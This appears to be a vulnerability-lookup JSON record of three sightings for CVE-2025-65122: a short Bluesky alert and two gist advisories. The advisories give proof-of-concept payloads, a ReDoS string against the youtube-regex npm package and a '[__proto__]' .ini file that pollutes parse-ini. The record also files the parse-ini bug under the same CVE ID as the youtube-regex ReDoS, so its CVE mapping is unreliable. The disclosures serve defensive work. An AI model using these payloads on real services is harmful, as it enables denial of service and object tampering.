{"vulnerability": "CVE-2025-65122", "sightings": [{"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"}, {"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now() let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now() console.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"}, {"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype  pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"}]}